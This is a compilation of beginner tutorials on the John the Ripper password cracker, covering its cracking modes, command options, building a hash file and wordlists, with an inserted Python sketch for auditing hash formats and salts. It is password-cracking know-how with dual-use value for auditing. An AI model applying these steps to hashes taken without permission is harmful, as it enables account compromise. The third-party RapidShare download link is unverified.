In the john folder you will find two sub-folders, doc and run, in which you can find the executable:

john-386.exe or john-mmx.exe

Now put the passwords you want to crack in a text file (e.g. pass.txt) like this:

username:password


Let's begin !

I) Modes

1) Single

This mode tests all the most used combinations, it works fine and lasts just a few seconds. Try this one first. 8)

syntax :

john -single pwdfile.txt


2) Word list

You can download good wordlists from http://openwall.com or by googling a bit...

syntax :

john -wordlist:list pwdfile.txt

example :

john -wordlist:C:\dico.txt pass.txt

3) Brute Force mode

As the title says, this mode brute-forces the password, so it can take two minutes or it can take centuries...

syntax :

john -incremental:type pwdfile.txt


The type variable can be:

all : to test letters + numbers + special chars
alpha : to test only the letters
digits : to test only the numbers

example :

john -incremental:alpha pass.txt


II) Go further

If you're lazy, you can use -w instead of -wordlist and -i instead of -incremental.
Example :

john -i:all pass.txt


JTR has a default wordlist (password.lst)
example :

john -w:password.lst pass.txt

john the ripper simple tut

I wrote this tutorial as best I could to try to explain to the newbie how to operate JTR. Remember, this is a newbie tutorial, so I won't go into detail with all of the features. JTR is a program that decrypts Unix passwords using DES (Data Encryption Standard).

Do these steps

Step 1: Download JTR.

Step 2: Extract JTR. In Windows use WinZip. In Unix type

tar -xzf john-1.6.tar.gz


Step 3: In windows open the command prompt. Go to the Start menu, click Run, type 'command' (no quotes) and press enter.

You with me? Good. Go to whatever directory you have JTR in. Type 'john' and press enter. A whole list of options will come up:


John the Ripper Version 1.6 Copyright © 1996-98 by Solar Designer


Usage: /WINDOWS/DESKTOP/JTR/JOHN-16/RUN/john [OPTIONS] [PASSWORD-FILES]
-single "single crack" mode
-wordfile:FILE -stdin wordlist mode, read words from FILE or stdin
-rules enable rules for wordlist mode
-incremental[:MODE] incremental mode [using section MODE]
-external:MODE external mode or word filter
-stdout[:LENGTH] no cracking, just write words to stdout
-restore[:FILE] restore an interrupted session [from FILE]
-session:FILE set session file name to FILE
-status[:FILE] print status of a session [from FILE]
-makechars:FILE make a charset, FILE will be overwritten
-show show cracked passwords
-test perform a benchmark
-users:[-]LOGIN|UID[,..] load this (these) user(s) only
-groups:[-]GID[,..] load users of this (these) group(s) only
-shells:[-]SHELL[,..] load users with this (these) shell(s) only
-salts:[-]COUNT load salts with at least COUNT passwords only
-format:NAME force ciphertext format NAME
(DES/BSDI/MD5/BF/AFS/LM)
-savemem:LEVEL enable memory saving, at LEVEL 1..3



You won't need most of these options. In fact, you don't really need any of these options. You can simply type 'john [filename]'. The filename must include the .txt extension. This is the regular crack. It will use bruteforce to decrypt all of the passwords in the file. If you're an impatient ass you can use a word list. This is not as effective but it's quicker (more on that later).

How to make a crackable file: Let's say that for some reason you have a DES encrypted password but no file. If you want to crack it (why else would you be here?) you need to make your own file. Just create a text file and paste in the password. Now put a username (just any old name will do) in front of it with a colon separating the two. It should look something like this:

User:gyuJo098KkLy9


Save the file as crackme.txt (just an example) and go to the prompt and type 'john crackme.txt' (no quotes obviously). Now you just have to wait.

Options:
Here is a list of the options and what they do.

-single: Single crack mode. This is only recommended for weak passwords as it includes only a few rules and a small wordlist.

Usage: john -single crackme.txt


-wordfile: Uses a wordlist (basically a dictionary attack). What this does is tries every word in the list until it finds a match or you reach the end of the list. This is quicker than the default (bruteforce) attack, but I don't recommend this because it doesn't always find a match. More notes on wordlists below.

Usage: john -wordfile:password.lst crackme.txt


-rules: Lets you define the rules for using wordlists. I don't use wordlists, so if you want to use this option I won't help you. Ok, ok, I'm just lazy. Shoot me.

-incremental: I like this method. It allows you to do a bruteforce attack
under certain modes.

Usage: john -incremental:alpha crackme.txt (only letters)
john -incremental:digits crackme.txt (only numbers)
john -incremental:lanman crackme.txt (letters, numbers, and some special characters)
john -incremental:all crackme.txt (all characters)


-external: This is a little complicated, so if you are lame don't mess with it. Basically this calls the options that are defined in the configuration settings. You can change these yourself, but I wouldn't recommend it unless you know what you're doing. No, I won't tell you how, go away.

Usage: john -external:[MODE] crackme.txt (replace MODE with whatever the
name of your mode is).


-restore: Ok, let's say that you need to stop the crack in the middle. Press ctrl+break. A file will be created in the JTR directory named 'restore' (no quotes doofus, and yes, no file extension). You can start the crack back up from that restore point. If you used the -session option you probably have a different filename.

Usage: john -restore:restore


-session: Use this if you know that you will have to stop JTR in the middle of a crack. It allows you to create a new file that holds the data of your session. You can then restore your session later.

Usage: john -session:[save to filename] crackme.txt


-status: Shows how far you got before stopping a crack (provided you used the -session option).

Usage: john -status:[filename]


-show: Shows how many passwords have been cracked in a file and how many are left.

Usage: john -show crackme.txt


-test: Shows how fast JTR will work on your computer.

Usage: john -test


-users: Cracks the password only for the user or users you tell it to.

Usage: john -users:User crackme.txt


-groups: Cracks the passwords only for the group or groups you tell it to.

Usage: john -group:lamers crackme.txt


-shells: Cracks the passwords only for the shell or shells you tell it to.

Usage: john -shells:shelly crackme.txt


-salts: Cracks the salts that have at least the number of passwords you specify.

Usage: john -salts:2 crackme.txt


-format: JTR can decrypt many different formats, not just DES (but this is the most widely used one). Use this to force JTR to try a certain format.

Usage: john -format:DES crackme.txt (force DES)
john -format:BSDI crackme.txt (force BSDI)
john -format:MD5 crackme.txt (force MD5)
john -format:BF crackme.txt (force BF)
john -format:AFS crackme.txt (force AFS)
john -format:LM crackme.txt (force LM)


-savemem: this tells JTR to automatically save your process at whatever
level you specify from one to three.

Usage: john -savemem:1 crackme.txt (save at level 1)
john -savemem:2 crackme.txt (save at level 2)
john -savemem:3 crackme.txt (save at level 3)



How to use a wordlist with JTR: I'll assume you already have a wordlist in the JTR directory (it comes with password.lst, if you want to make your own I'll tell you how later). Go to the prompt and type 'john -wordfile:password.lst crackme.txt' (no quotes, damnit). If the password is in the wordlist, it will work. Otherwise, you deserve it for
using a wordlist when you have bruteforce capabilities, shame on you.

How to create a wordlist to use with JTR: First I will include a few lines of the wordlist supplied with JTR:

#!comment: Common passwords, compiled by Solar Designer.
12345
abc123
password
passwd
123456


The top line is a comment (duh). If you want to make a comment in your wordlist just follow the example. The other lines are passwords that the program will try when you use the wordlist. Put each password on a new line. In the event that you are too lazy to write your own wordlist you can download one (once again, I'm far too lazy to give you a link). It may or may not already be the right file format (.lst). If it isn't, just go to the prompt. Assuming the filename is lazy.txt, type 'rename lazy.txt lazy.lst'

Piping Output: Remember the -show option? You can get JTR to save that
output to a file. Just type 'john -show crackme.txt > crackinfo.txt'

There's my guide. I have an FAQ below:

Q: Can I mix options?
A: Yes, certain options can be mixed. You can mix options as long as they don't clash. Play around with it a while.

Q: What does "Loaded 0 passwords" mean?
A: There was a problem with either your password file or the syntax of your command. If you force BF decryption when your file has DES encryption it won't work. If your password file isn't made right it won't work.

Q: What does "Password files required, but none specified" mean?
A: Can you read? You can't just tell JTR to crack, you need to give it a file.

Q: What does "Unknown cyphertext format name requested" mean?
A: When you use the -format option you need to check that you typed the name of the format correctly.

Q: How come when I typed 'john -users: login|uid crackme.txt' (which by the way is the usage shown in the list of option by JTR) I received this error:
Option requires a parameter: "-users:"
Bad command or file name
A: The piping symbol you used (|) can mean two different things. In this case it means 'or'. You're supposed to use login OR uid. When you type it in a DOS window, you are running two separate commands.

Q: Can I speed up the bruteforce?
A: Sure, just toss that old ass box of yours and get a new one.
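
The salts tip and the -format option both depend on what the password file actually contains, which is also what a defender should know about their own file: which hash formats are in use and which accounts share a salt. The following Python sketch is an added example, not part of the original tutorials or of JTR; the function names are hypothetical, the patterns cover only the DES, BSDI, MD5 and BF crypt(3) layouts, and all sample entries other than the tutorial's own User line are constructed.

```python
import re
from collections import Counter, defaultdict

B64 = r"[./0-9A-Za-z]"
# (name as used by -format, pattern, function extracting the salt)
FORMATS = [
    ("BF", re.compile(r"^\$2[abxy]?\$\d\d\$" + B64 + r"{53}$"),
     lambda h: h.split("$")[3][:22]),
    ("MD5", re.compile(r"^\$1\$[^$]{0,8}\$" + B64 + r"{22}$"),
     lambda h: h.split("$")[2]),
    ("BSDI", re.compile(r"^_" + B64 + r"{19}$"), lambda h: h[1:9]),
    ("DES", re.compile(r"^" + B64 + r"{13}$"), lambda h: h[:2]),
]

# Constructed entries (not hashes of real passwords); the first line is
# the example entry from the tutorial text.
SAMPLE = """\
User:gyuJo098KkLy9
alice:abCdEfGhIjKlM
bob:abZyXwVuTsRqP
carol:$1$saltsalt$ConstructedSampleHash1
dave:*
""".splitlines()


def classify(hash_field):
    """Return (format, salt) for a hash field, or (None, None)."""
    for name, pattern, salt_of in FORMATS:
        if pattern.match(hash_field):
            return name, salt_of(hash_field)
    return None, None


def audit(lines):
    """Summarise formats, distinct salts and salts shared by accounts."""
    formats, by_salt, skipped = Counter(), defaultdict(list), []
    for line in (l.strip() for l in lines):
        if not line or line.startswith("#"):
            continue
        login, _, rest = line.partition(":")
        name, salt = classify(rest.split(":")[0])
        if name is None:
            skipped.append(login)  # locked, empty or unknown format
            continue
        formats[name] += 1
        by_salt[(name, salt)].append(login)
    shared = {k: v for k, v in by_salt.items() if len(v) > 1}
    return {"formats": dict(formats), "salts": len(by_salt),
            "shared": shared, "skipped": skipped}
```

Accounts still on traditional DES are the first to migrate: that format ignores everything past 8 characters and has only 4096 possible salts, so shared salts such as alice and bob above become common as the file grows.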

John32, GUI for JTR

http://rapidshare.com/files/110796164/John32.rar

John the ripper

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

http://www.openwall.com/john/